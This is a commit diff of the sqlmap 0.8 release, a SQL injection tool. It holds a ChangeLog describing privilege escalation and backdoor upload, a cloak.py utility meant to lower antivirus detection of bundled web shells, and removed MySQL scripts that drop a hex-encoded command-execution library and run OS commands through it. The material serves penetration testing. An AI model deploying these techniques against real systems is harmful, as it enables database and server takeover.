sqlmap 0.8 stable!

1. there's kitrap0d (MS10-015) which is far more reliable, just recently fixed
2. works only to priv esc basically on MSSQL when it runs as NETWORK SERVICE and the machine is not patched against MS09-012 which is "rare" (hopefully) nowadays.
Now sqlmap relies on kitrap0d and incognito to privilege escalate the database process' user privileges to SYSTEM, both via Meterpreter.

Minor layout adjustments.

doc/ChangeLog

@@ -1,3 +1,68 @@
+sqlmap (0.8-1) stable; urgency=low
+
+  * Support to enumerate and dump all databases' tables containing user
+    provided column(s) by specifying for instance '--dump -C user,pass'.
+    Useful to identify for instance tables containing custom application
+    credentials (Bernardo).
+  * Support to parse -C (column name(s)) when fetching
+    columns of a table with --columns: it will enumerate only columns like
+    the provided one(s) within the specified table (Bernardo).
+  * Support for takeover features on PostgreSQL 8.4 (Bernardo).
+  * Enhanced --priv-esc to rely on new Metasploit Meterpreter's
+    'getsystem' command to elevate privileges of the user running the
+    back-end DBMS instance to SYSTEM on Windows (Bernardo).
+  * Automatic support in --os-pwn to use the web uploader/backdoor to
+    upload and execute the Metasploit payload stager when stacked queries
+    SQL injection is not supported, for instance on MySQL/PHP and
+    MySQL/ASP, but there is a writable folder within the web server
+    document root (Bernardo and Miroslav).
+  * Fixed web backdoor functionality for --os-cmd, --os-shell and --os-pwn
+    useful when web application does not support stacked queries (Bernardo).
+  * Added support to properly read (--read-file) also binary files via
+    PostgreSQL by injecting sqlmap new sys_fileread() user-defined
+    function (Bernardo and Miroslav).
+  * Updated active fingerprint and comment injection fingerprint for
+    MySQL 5.1, MySQL 5.4 and MySQL 5.5 (Bernardo).
+  * Updated active fingerprint for PostgreSQL 8.4 (Bernardo).
+  * Support for NTLM authentication via python-ntlm third party library,
+    http://code.google.com/p/python-ntlm/, --auth-type NTLM (Bernardo).
+  * Support to automatically decode deflate, gzip and x-gzip HTTP
+    responses (Miroslav).
+  * Support for Certificate authentication, --auth-cert option added
+    (Miroslav).
+  * Added support for regular expression based scope when parsing Burp or
+    Web Scarab proxy log file (-l), --scope (Miroslav).
+  * Added option (-r) to load a single HTTP request from a text file
+    (Miroslav).
+  * Added option (--ignore-proxy) to ignore system default HTTP proxy
+    (Miroslav).
+  * Added support to ignore Set-Cookie in HTTP responses,
+    --drop-set-cookie (Miroslav).
+  * Added support to specify which Google dork result page to parse,
+    --gpage to be used together with -g (Miroslav).
+  * Major bug fix and enhancements to the multi-threading (--threads)
+    functionality (Miroslav).
+  * Fixed URL encoding/decoding of GET/POST parameters and Cookie header
+    (Miroslav).
+  * Refactored --update to use python-svn third party library if available
+    or 'svn' command to update sqlmap to the latest development version
+    from subversion repository (Bernardo and Miroslav).
+  * Major bugs fixed (Bernardo and Miroslav).
+  * Cleanup of UDF source code repository,
+    https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack (Bernardo
+    and Miroslav).
+  * Major code cleanup (Miroslav).
+  * Added simple file encryption/compression utility, extra/cloak/cloak.py,
+    used by sqlmap to decrypt on the fly Churrasco, UPX executable and web
+    shells consequently reducing drastically the number of anti-virus
+    softwares that mistakenly mark sqlmap as a malware (Miroslav).
+  * Updated user's manual (Bernardo and Miroslav).
+  * Created several demo videos, hosted on YouTube
+    (http://www.youtube.com/user/inquisb) and linked from
+    http://sqlmap.sourceforge.net/demo.html (Bernardo).
+
+ -- Bernardo Damele A. G. <bernardo.damele@gmail.com>  Sun, 14 Mar 2010 10:00:00 +0000
+
 sqlmap (0.8rc1-1) stable; urgency=low
 
   * Major enhancement to the Microsoft SQL Server stored procedure

doc/THANKS

@@ -1,10 +1,16 @@
 == Individuals ==
 
+David Alvarez <david.alvarez.s@gmail.com>
+    for reporting a bug
+
 Chip Andrews <chip@sqlsecurity.com>
     for his excellent work maintaining the SQL Server versions database
     at SQLSecurity.com and permission to implement the update feature
     taking data from his site
 
+Otavio Augusto <otavioarj@gmail.com>
+    for reporting a minor bug
+
 Simon Baker <simonb@sec-1.com>
     for reporting some bugs
 
@@ -12,6 +18,9 @@ Daniele Bellucci <daniele.bellucci@gmail.com>
     for starting sqlmap project and developing it between July and August
     2006
 
+Velky Brat <velkybrat@gmail.com>
+    for suggesting a minor enhancement to the bisection algorithm
+
 Jack Butler <fattredd@hotmail.com>
     for providing me with the sqlmap site favicon
 
@@ -69,9 +78,15 @@ Giorgio Fedon <giorgio.fedon@gmail.com>
     for suggesting a speed improvement for bisection algorithm
     for reporting a bug when running against Microsoft SQL Server 2005
 
+Kasper Fons <thefeds@mail.dk>
+    for reporting a bug
+
 Alan Franzoni <alan.franzoni@gmail.com>
     for helping me out with Python subprocess library
 
+Daniel G. Gamonal <lgrecol@gmail.com>
+    for reporting a minor bug
+
 Ivan Giacomelli <truemilk@insiberia.net>
     for reporting a bug
     for suggesting a minor enhancement
@@ -95,8 +110,8 @@ Will Holcomb <wholcomb@gmail.com>
     for his MultipartPostHandler class to handle multipart POST forms and
     permission to include it within sqlmap source code
 
-Daniel Hückmann <sanitybit@gmail.com>
-    for reporting a minor bug
+Daniel Huckmann <sanitybit@gmail.com>
+    for reporting a couple of bugs
 
 Mounir Idrassi <mounir.idrassi@idrix.net>
     for his compiled version of UPX for Mac OS X
@@ -129,7 +144,8 @@ Guido Landi <lists@keamera.org>
     'sp_replwritetovarbin' stored procedure heap-based buffer overflow
     (MS09-004) exploit development
     for presenting with me at SOURCE Conference 2009 in Barcelona (Spain)
-    on September 21, 2009
+    on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on
+    November 20, 2009
 
 Lee Lawson <Lee.Lawson@dns.co.uk>
     for reporting a minor bug
@@ -255,7 +271,7 @@ Bedirhan Urgun <bedirhanurgun@gmail.com>
     for benchmarking sqlmap in the context of his SQL injection
     benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench
 
-Kyprianos Vassilopoulos <kyprianos.vasilopoulos@gmail.com>
+Kyprianos Vasilopoulos <kyprianos.vasilopoulos@gmail.com>
     for reporting an unhandled connection exception
 
 Anthony Zboralski <anthony.zboralski@bellua.com>
@@ -263,6 +279,9 @@ Anthony Zboralski <anthony.zboralski@bellua.com>
     for reporting a few minor bugs
     for donating to sqlmap development
 
+dsu <dsu@dsu.com.ua>
+    for reporting a bug
+
 fufuh <fufuh@users.sourceforge.net>
     for reporting a bug when running on Windows
 

extra/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

extra/cloak/README.txt

@@ -0,0 +1,22 @@
+To use cloak.py you need to pass it the original file,
+and optionally the output file name.
+
+Example:
+
+$ python ./cloak.py -i backdoor.asp -o backdoor.asp_
+
+This will create an encrypted and compressed binary file backdoor.asp_.
+
+Such file can then be converted to its original form by using the -d
+functionality of the cloak.py program:
+
+$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
+
+If you skip the output file name, general rule is that the compressed
+file names are suffixed with the character '_', while the original is
+get by skipping the last character. So, that means that the upper
+examples can also be written in the following form:
+
+$ python ./cloak.py -i backdoor.asp
+
+$ python ./cloak.py -d -i backdoor.asp_

extra/cloak/__init__.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+pass

extra/cloak/cloak.py

@@ -0,0 +1,93 @@
+#!/usr/bin/env python
+
+"""
+cloak.py - Simple file encryption/compression utility
+Copyright (C) 2010  Miroslav Stampar, Bernardo Damele A. G.
+email(s): miroslav.stampar@gmail.com, bernardo.damele@gmail.com
+
+This library is free software; you can redistribute it and/or
+modify it under the terms of the GNU Lesser General Public
+License as published by the Free Software Foundation; either
+version 2.1 of the License, or (at your option) any later version.
+
+This library is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+Lesser General Public License for more details.
+
+You should have received a copy of the GNU Lesser General Public
+License along with this library; if not, write to the Free Software
+Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import bz2
+import os
+import sys
+
+from optparse import OptionError
+from optparse import OptionParser
+
+def hideAscii(data):
+    retVal = ""
+    for i in xrange(len(data)):
+        if ord(data[i]) < 128:
+            retVal += chr(ord(data[i]) ^ 127)
+        else:
+            retVal += data[i]
+            
+    return retVal
+
+def cloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.compress(f.read())
+    f.close()
+    
+    return hideAscii(data)
+        
+def decloak(inputFile):
+    f = open(inputFile, 'rb')
+    data = bz2.decompress(hideAscii(f.read()))
+    f.close()
+    
+    return data
+
+def main():
+    usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
+    parser  = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
+        parser.add_option('-i', dest='inputFile', help='Input file')
+        parser.add_option('-o', dest='outputFile', help='Output file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+    
+    if not os.path.isfile(args.inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        sys.exit(1)
+    
+    if not args.decrypt:
+        data = cloak(args.inputFile)
+    else:
+        data = decloak(args.inputFile)
+
+    if not args.outputFile:
+        if not args.decrypt:
+            args.outputFile = args.inputFile + '_'
+        else:
+            args.outputFile = args.inputFile[:-1]
+        
+    fpOut      = open(args.outputFile, 'wb')
+    sys.stdout = fpOut
+    sys.stdout.write(data)
+    sys.stdout.close()
+
+
+if __name__ == '__main__':
+    main()

extra/dbgtool/README.txt

@@ -18,7 +18,3 @@ To be able to execute it on Windows you have to rename it to end with
 '.com' or '.exe':
 
 > ren nc_exe nc.exe
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>

extra/dbgtool/dbgtool.py

@@ -2,7 +2,7 @@
 
 """
 dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (C) 2009  Bernardo Damele A. G.
+Copyright (C) 2009-2010  Bernardo Damele A. G.
 web: http://bernardodamele.blogspot.com/
 email: bernardo.damele@gmail.com
 

extra/msfauxmod/README.txt

@@ -76,7 +76,3 @@ SQLMAP: [*] shutting down at: 16:23:21
 SQLMAP: 
 [*] Auxiliary module execution completed
 msf auxiliary(wmap_sqlmap) > 
-
-
-Happy hacking!
-Bernardo Damele A. G. <bernardo.damele@gmail.com>

extra/mysqludfsys/command_execution/linux.sql

@@ -1,120 +0,0 @@
--- Notes:
--- 
--- The SO compiled using MySQL 5.0.67 C libraries works also on MySQL
--- 5.1.30 and MySQL 4.1.22 (TODO: confirm)
--- 
--- SO compiled using MySQL 5.1.30 C libraries
--- lib_mysqludf_sys.so: 12896 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, not stripped)
--- lib_mysqludf_sys.so: 5476 bytes (ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped)
--- 
--- Little hack to compress the shared object:
--- * Compile with -O1 the shared object
--- * Use strip to remove all symbols (-s) and non-global symbols (-x)
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
--- Insert the hexadecimal encoded UDF in the table
--- 
--- SO compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x7f454c46010101000000000000000000030003000100000010080000340000007c1100000000000034002000050028001900180001000000000000000000000000000000bc0e0000bc0e0000050000000010000001000000040f0000041f0000041f00000801000010010000060000000010000002000000180f0000181f0000181f0000d0000000d0000000060000000400000051e574640000000000000000000000000000000000000000060000000400000052e57464040f0000041f0000041f0000fc000000fc00000004000000010000001100000024000000000000000d00000000000000030000001a00000000000000070000001b0000000a000000140000000f000000150000000c0000000e0000001e000000060000001c000000000000000000000000000000010000000000000000000000020000000400000000000000230000002200000000000000130000001d000000170000000b000000000000000000000005000000090000002100000011000000000000001800000020000000080000001f0000000000000010000000000000001900000000000000160000000000000012000000000000001100000010000000040000000700000001080440801946c99ca40803900460831000000012000000130000001500000016000000180000001b0000001d0000000000);
-UPDATE udftest SET data=CONCAT(data,0x00001e000000000000001f0000002000000021000000220000002300000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed971581ca868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff3b9fd4a0ad73d1c50b5911feab5fbe12000000000000000000000000000000009500000000000000000000001200000001000000000000000000000020000000250000000000000000000000200000009b0000000000000000000000120000007201000000000000000000001200000039010000000000000000000012000000a3000000000000000000000012000000ab00000000000000000000001200000065010000000000000000000012000000480100000000000000000000120000008e000000000000000000000012000000b8000000000000000000000012000000160000000000000000000000220000004f010000000000000000000012000000b1000000000000000000000012000000400100006a0d00008b00000012000b0075000000db0800000500000012000b0010000000980e00000000000012000c00ff0000008d0c00004b00000012000b00df000000ac07000000000000120009008a0100000c200000000000001000f1ff300100004d0d00001d00000012000b009601000014200000000000001000f1ff);
-UPDATE udftest SET data=CONCAT(data,0x56000000d10800000500000012000b00c90000001f0a00007300000012000b006a0100000f0e00004500000012000b0039000000cc0800000500000012000b00f2000000140c00007900000012000b00830100000c200000000000001000f1ff65000000d60800000500000012000b00e5000000050b00000f01000012000b00d7000000920a00007300000012000b0015010000d80c00007500000012000b0056010000f50d00001a00000012000b0085000000e00800003f01000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f63007374726e6370790066676574730070636c6f7365005f5f737461636b5f63686b5f6661696c007379735f6576616c5f696e6974007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379);
-UPDATE udftest SET data=CONCAT(data,0x735f657865630073797374656d007379735f736574006d656d63707900736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3400474c4942435f322e3000474c4942435f322e310000000002000000000003000300030003000300030003000300040005000300020001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000400790100001000000000000000731f6909000005009b010000100000001469690d00000400a7010000100000001069690d00000300b1010000100000001169690d00000200bb010000000000001e09000008000000082000000800000014090000020b0000c50b0000020b00002b090000020100006a090000020400008b09000002070000b109000002080000c3090000020f0000100a0000020c00005f0d0000020600009c0d0000020a0000c10d0000020a0000df0d0000020e0000090e000002090000220e000002050000e81f000006020000ec1f000006030000f01f0000060d0000002000000702000004200000070d00005589e55383ec04e8000000005b81c33c1800008b93f4ffffff85d274);
-UPDATE udftest SET data=CONCAT(data,0x05e81e000000e8bd000000e888060000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff000000005589e55653e8ad00000081c3da17000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8b8ffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c35b17000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35589e557565381ec2c0400008b5d0c8b45148985d8fbffff8b55188995d4fbffff65a1140000008945f031c0c7042401000000e8fcffffff89c6c7442404b40e00008b43088b00890424e8fcffffff8985dcfbffffc785e0fbffff00000000eb548dbdf0fbffffb800000000b9fffffffff2ae89c8f7d08d78ff8b9de0fbffff01fb895c2404893424e8fcffffff89c6897c24088d95f0fbffff895424048b95e0fbffff8d0410890424e8fcffffff899de0fbffff8b85dcfbffff89442408c7442404000400008d95f0fbffff891424e8fcffffff85c075888b);
-UPDATE udftest SET data=CONCAT(data,0x85dcfbffff890424e8fcffffff803e00740485f6750b8b95d4fbffffc60201eb268b85e0fbffffc64406ff0089f7b800000000b9fffffffff2aef7d183e9018b95d8fbffff890a89f08b55f0653315140000007405e8fcffffff81c42c0400005b5e5f5dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e58b450c8b5510833801750d8b4004b9000000008338007454c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b90100000089c85dc35589e55383ec048b550c8b5d10833a027444c70345787065c7430463746564c7430820657861c7430c63746c79c743102074776fc7431420617267c74318756d656e66c7431c7473c6431e00ba01000000e9b10000008b4204833800744cc70345787065c7430463746564c7430820737472c7430c696e6720c7431074797065c7431420666f72c74318206e616dc7431c65207061c7432072616d65c7432474657200ba010000);
-UPDATE udftest SET data=CONCAT(data,0x00eb5dc74004000000008b520c8b0283c002034204890424e8fcffffff8b550889420cba0000000085c07534c703436f756cc7430464206e6fc743087420616cc7430c6c6f6361c743107465206dc74314656d6f7266c743187900ba0100000089d083c4045b5dc35589e58b450c8b551083380175158b4004833800750d8b4508c60001b800000000eb54c70245787065c7420463746564c7420820657861c7420c63746c79c74210206f6e65c7421420737472c74218696e6720c7421c74797065c7422020706172c74224616d657466c742286572c6422a00b8010000005dc35589e58b4510c7006c69625fc740046d797371c740086c756466c7400c5f737973c7401020766572c7401473696f6ec7401820302e3066c7401c2e33c6401e008b5514c7021e0000005dc35589e58b5510b9000000008b450c833800745ec7024e6f2061c742047267756dc74208656e7473c7420c20616c6cc742106f776564c7421420287564c74218663a206cc7421c69625f6dc742207973716cc742247564665fc742287379735fc7422c696e666f66c742302900b90100000089c85dc35589e583ec088b450c8b40088b00890424e8fcffffff89c2c1fa1fc9c35589e583ec18895df48975f8897dfc8b5d0c8b45088b700c8b430c8b108d7c16018b43088b008954240889442404893424e8fcff);
-UPDATE udftest SET data=CONCAT(data,0xffff8b430c8b00c60406008b530c8b43088b48048b420489442408894c2404893c24e8fcffffff8b430c8b4004c6040700c744240801000000897c2404893424e8fcffffff89c2c1fa1f8b5df48b75f88b7dfc89ec5dc35589e583ec088b45088b400c85c07408890424e8fcffffffc9c35589e55783ec048b450c8b40088b00890424e8fcffffff89c285c075088b4518c60001eb1889c7b800000000b9fffffffff2aef7d183e9018b4514890889d083c4045f5dc39090909090909090909090905589e55653e85dfaffff81c38a1100008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c350110000e860f9ffff595bc9c37200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000790100000c000000ac0700000d000000980e000004000000d4000000f5feff6fb001000005000000a404000006000000640200000a000000c50100000b0000001000000003000000f41f000002000000100000001400000011000000170000009c07000011000000040700001200000098000000);
-UPDATE udftest SET data=CONCAT(data,0x13000000080000001600000000000000feffff6fb4060000ffffff6f01000000f0ffff6f6a060000faffff6f0200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000181f00000000000000000000f20700000208000008200000004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200004743433a20285562756e747520342e332e322d317562756e747531322920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e74000000000000000000);
-UPDATE udftest SET data=CONCAT(data,0x000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000d4000000d4000000dc000000030000000000000004000000040000000b000000f6ffff6f02000000b0010000b0010000b400000003000000000000000400000004000000150000000b00000002000000640200006402000040020000040000000100000004000000100000001d0000000300000002000000a4040000a4040000c50100000000000000000000010000000000000025000000ffffff6f020000006a0600006a060000480000000300000000000000020000000200000032000000feffff6f02000000b4060000b40600005000000004000000010000000400000000000000410000000900000002000000040700000407000098000000030000000000000004000000080000004a00000009000000020000009c0700009c07000010000000030000000a0000000400000008000000530000000100000006000000ac070000ac07000030000000000000000000000004000000000000004e0000000100000006000000dc070000dc0700003000000000000000000000000400000004000000590000000100000006000000100800001008000088060000000000000000000010000000000000005f0000000100000006000000980e0000980e00001c000000);
-UPDATE udftest SET data=CONCAT(data,0x00000000000000000400000000000000650000000100000032000000b40e0000b40e000002000000000000000000000001000000010000006d0000000100000002000000b80e0000b80e00000400000000000000000000000400000000000000770000000100000003000000041f0000040f000008000000000000000000000004000000000000007e00000001000000030000000c1f00000c0f00000800000000000000000000000400000000000000850000000100000003000000141f0000140f000004000000000000000000000004000000000000008a0000000600000003000000181f0000180f0000d000000004000000000000000400000008000000930000000100000003000000e81f0000e80f00000c00000000000000000000000400000004000000980000000100000003000000f41f0000f40f00001400000000000000000000000400000004000000a1000000010000000300000008200000081000000400000000000000000000000400000000000000a700000008000000030000000c2000000c1000000800000000000000000000000400000000000000ac0000000100000000000000000000000c100000b90000000000000000000000010000000000000001000000030000000000000000000000c5100000b500000000000000000000000100000000000000);
-
-
--- Export the hexadecimal encoded UDF to a binary file on the file system
--- 
--- On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0:
--- 
--- From MySQL 5.1 and 6.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. The file 
---      must be located in the plugin directory. This directory is given
---      by the value of the plugin_dir system variable.
--- 
--- Note that /TODO/plugin DOES NOT
--- exist by default so it is NOT possible to save the SO in the proper
--- folder where MySQL server looks for SOs.
--- SHOW VARIABLES WHERE variable_name='plugin_dir';
--- 
--- References:
--- http://dev.mysql.com/doc/refman/5.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/6.0/en/create-function-udf.html
--- 
--- The SO can be only in /TODO
--- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 5.1 >= 5.1.19
--- SELECT data FROM udftest INTO DUMPFILE '/TODO/lib_mysqludf_sys.so'; -- On MySQL 6.0
---
--- On MySQL 4.1 < 4.1.25, MySQL 5.0 < 5.0.67 and MySQL 5.1 < 5.1.19:
--- 
--- From MySQL 4.1 and 5.0 official documentation:
--- 
---      shared_library_name is the basename of the shared object file
---      that contains the code that implements the function. As of MySQL
---      M.m.m, the file must be located in the plugin directory. This
---      directory is given by the value of the plugin_dir system variable.
---      If the value of plugin_dir is empty, the behavior that is used
---      before M.m.m applies: The file must be located in a directory
---      that is searched by your system's dynamic linker.
--- 
--- References:
--- http://dev.mysql.com/doc/refman/4.1/en/create-function-udf.html
--- http://dev.mysql.com/doc/refman/5.0/en/create-function-udf.html
--- 
--- The SO can be in either /lib, /usr/lib or one of the paths specified in
--- /etc/ld.so.conf file, none of these paths are writable by mysql user by
--- default (tested on MySQL 5.0.67 with NO plugin_dir set in my.cnf
--- configuration file, which is the default setting)
--- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file
-SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file
--- SELECT data FROM udftest INTO DUMPFILE '/usr/lib/lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql. On MySQL 5.1 < 5.1.19 with NO plugin_dir set in my.ini configuration file
--- 
--- Notes:
--- If the library file already exists, the user mysql does not have access
--- to overwrite it
--- The following enumerates the MySQL data directory
--- SELECT @@datadir
--- The followings will save into /var/lib/mysql/. It is not a valid PATH
--- where MySQL looks for SO
--- SELECT data FROM udftest INTO DUMPFILE './lib_mysqludf_sys.so';
--- The following will save into /var/lib/mysql/mysql where 'mysql' is the
--- database name where it is connected. It is not a valid PATH where MySQL
--- looks for SO
--- SELECT data FROM udftest INTO DUMPFILE 'lib_mysqludf_sys.so'; -- -rw-rw-rw- 1 mysql mysql
--- The following would save into / (Permission denied)
--- SELECT data FROM udftest INTO DUMPFILE '/lib_mysqludf_sys.so';
-
-
--- Create two functions from the binary UDF file
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0
-CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
-CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
-
-
--- Test the two functions
-SELECT sys_exec('echo test > /tmp/lib_mysqludf_sys.txt'); -- -rw-rw---- 1 mysql    mysql
-SELECT sys_eval('cat /tmp/lib_mysqludf_sys.txt ; id');
-
-
--- Cleanup the file system and the database
-SELECT sys_exec('rm -f /tmp/lib_mysqludf_sys.*');
-DROP TABLE IF EXISTS udftest;
--- DROP FUNCTION sys_exec; -- without 'IF EXISTS ' on MySQL < 5.0
--- DROP FUNCTION sys_eval; -- without 'IF EXISTS ' on MySQL < 5.0
-DROP FUNCTION IF EXISTS sys_exec; -- On MySQL >= 5.0
-DROP FUNCTION IF EXISTS sys_eval; -- On MySQL >= 5.0

extra/mysqludfsys/command_execution/windows.sql

@@ -1,128 +0,0 @@
--- Notes:
--- 
--- The DLL compiled using MySQL 5.1.30 C libraries works also on MySQL
--- 5.0.67 and MySQL 4.1.22
--- 
--- DLL compiled using MySQL 5.1.30 C libraries
--- lib_mysqludf_sys.dll: 9216 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit)
--- lib_mysqludf_sys.dll: 6656 bytes (MS-DOS executable PE  for MS Windows (DLL) (GUI) Intel 80386 32-bit, UPX compressed)
--- 
--- Little hack to compress the dynamic-linked library:
--- * Read instructions on http://rpbouman.blogspot.com/2007/09/creating-mysql-udfs-with-microsoft.html
---   * Remember to compile it under Visual C++ 2008 with the
---     'Configuration' set as 'Release'
--- * Use upx (http://upx.sourceforge.net) over the DLL:
---   * upx -9 library.dll -o library_upx.dll
-
-
--- Create a table with one field data-type text
-DROP TABLE IF EXISTS udftest;
-CREATE TABLE udftest(data blob);
-
-
--- Insert the hexadecimal encoded UDF in the table
--- 
--- DLL compiled using MySQL 5.1.30 C libraries
-INSERT INTO udftest(data) VALUE (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000ad137127e9721f74e9721f74e9721f74e00a8c74eb721f74e00a8a74e8721f74e00a9c74e7721f74e00a9b74eb721f742a7d4274ea721f74e9721e74c0721f74e00a9674e8721f74e00a8d74e8721f74e00a8e74e8721f7452696368e9721f7400000000000000000000000000000000504500004c010300ce2e8e490000000000000000e00002210b010900001000000010000000600000507c0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020040010000100000100000000010000010000000000000100000007c830000b8010000b4820000c800000000800000b402000000000000000000000000000000000000348500001000000000000000000000000000000000000000000000000000000000000000000000001c7e00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000);
